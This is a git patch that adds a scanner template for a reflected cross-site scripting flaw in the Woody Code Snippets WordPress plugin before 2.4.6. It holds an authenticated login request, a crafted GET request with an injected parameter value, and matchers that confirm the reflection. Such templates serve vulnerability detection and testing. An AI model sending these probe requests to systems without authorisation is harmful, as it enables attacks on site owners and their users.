From 1dccc86c8841b20677d0c85ca11b3a4fa6e1a2e2 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 4 Jul 2022 17:31:46 +0530 Subject: [PATCH] Create wp-insert-php-xss.yaml --- .../wordpress/wp-insert-php-xss.yaml | 46 +++++++++++++++++++ 1 file changed, 46 insertions(+) create mode 100644 vulnerabilities/wordpress/wp-insert-php-xss.yaml diff --git a/vulnerabilities/wordpress/wp-insert-php-xss.yaml b/vulnerabilities/wordpress/wp-insert-php-xss.yaml new file mode 100644 index 0000000000..afe2b16ec3 --- /dev/null +++ b/vulnerabilities/wordpress/wp-insert-php-xss.yaml @@ -0,0 +1,46 @@ +id: wp-insert-php-xss + +info: + name: Woody Code Snippets < 2.4.6 - Reflected Cross-Site Scripting + author: Akincibor,DhiyaneshDk + severity: medium + description: The plugin does not escape a generated URLs before outputting them back in an attribute, leading to Reflected Cross-Site Scripting + reference: + - https://wpscan.com/vulnerability/6d6761b7-0c17-4428-8748-2179732030a3 + metadata: + verified: true + tags: wp-plugin,xss,wp,wordpress,authenticated,woody + +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + + - | + GET /wp-admin/edit.php?post_type=wbcr-snippets&page=import-wbcr_insert_php&a"> HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'import-wbcr_insert_php&a\">"' + - 'Woody Code Snippets Import' + condition: and + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200